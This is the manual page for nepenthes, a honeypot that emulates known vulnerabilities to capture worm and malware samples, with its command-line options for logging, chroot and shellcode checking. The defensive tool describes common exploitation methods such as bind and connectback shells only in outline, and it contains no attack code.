NAME
nepenthes - finest collection -
SYNOPSIS
nepenthes [OPTIONS]
nepenthes [OPTIONS] [PATH]
DESCRIPTION
By emulating widespread vulnerabilities Nepenthes is able to catch and
store worms using these vulnerabilities. Furthermore you are able to
determine the malware activity on a network by deploying a nepenthes
sensor. The programm emulates different well known vulnerabilities
waiting for malicious connections trying to exploit these. If a
connection tries to exploit something, nepenthes tries to guess which
exploit is going to be used. There are several different ways a
exploitation can happen, the attacker can ask nepenthes to:
o connect a provided ip & port offering a shell there (connectback)
o bind a shell on a port (bindshell)
o direct execute a shellcommand
o provide a url from where to download a file and execute the file
o use specific filetransferr mechanisms to transferr the file (link,
blink, mydoom ...)
If a shell is expected, bindshell or connectback shell, nepenthes will
offer this shell to the attacker and fullfill the requested actions.
In most cases there are two ways worms try to spread themselves using a
shell,
o tftp - trivial filetransfer protocoll using tftp.exe in Microsoft
Windows.
o ftp - filetransfer protocoll using ftp.exe in Microsoft Windows.
Nepenthes will parse the shell instructions and try to download the
file, upon success the file will be stored.
OPTIONS
-c PATH, --config=PATH
PATH to nepenthes.conf
-d PATTERN, --disk-log=PATTERN
apply filter to console logging. PATTERN can consist of crit,
warn, info, debug and spam, combine tags using , .
-f OPTIONS PATH, --file-check=OPTIONS PATH
Use Nepenthes to check if a file or a directory of files in PATH
contain known shellcodes. PATH can be a directory or multiple
files. OPTIONS can be rmknown,rmnonop,nothing.
-h, --help
show help
-H, --large-help
show help with default values
-i, --info
how to contact us
-k, --check-config
check nepenthes.conf config for syntax errors
-l PATTERN, --log=PATTERN
apply filter to console logging. PATTERN can consist of crit,
warn, info, debug and spam, combine tags using , .
-L, --logging-help
display help for -d and -l
-o, --no-color
log without colors to console (does not work yet).
-r PATH, --chroot=PATH
chroot to PATH
-R, --ringlog
use ringlogger instead of filelogger
-u USER, --user=USER
switch the user the process runs as USER must be a users name.
-g GROUP, --group=GROUP
switch process group GROUP must be a groups name.
-v, --version
show version
-w, --workingdir
where shall the process live
EXAMPLES
nepenthes -d crit,warn,info
start nepenthes and log only messaged with loglevel critical,
warning and info to disk
nepenthes -u marshall -g mother
start nepenthes and change to user marshall and group mother.
nepenthes -r /opt/nepenthes
start nepenthes and chroot to /opt/nepenthes
nepenthes -u marshall -g mother -r /opt/nepenthes
start nepenthes and change to user marshall and group mother
and chroot to /opt/nepenthes
nepenthes -f rmknown,rmnonop,dononp /opt/nepenthes/var/hexdumps/
check the directory /opt/nepenthes/var/hexdumps for known
shellcodes, remove known shellcodes, remove shellcodes
without nop slide, check shellcodes without nopslide.
nepenthes -f nothing /tmp/*.bin /tmp/unknown_shellcodes/
check the files in the directory /opt/nepenthes/var/hexdumps
and the files in /tmp/*.bin for known shellcodes, do
nothing.
FILES
etc/nepenthes/nepenthes.conf
nepenthes configuration file
lib/nepenthes/
nepenthes modules
etc/nepenthes/
nepenthes modules configuration files
BUGS
this manual is a pain
SEE ALSO
nepenthes.conf(5)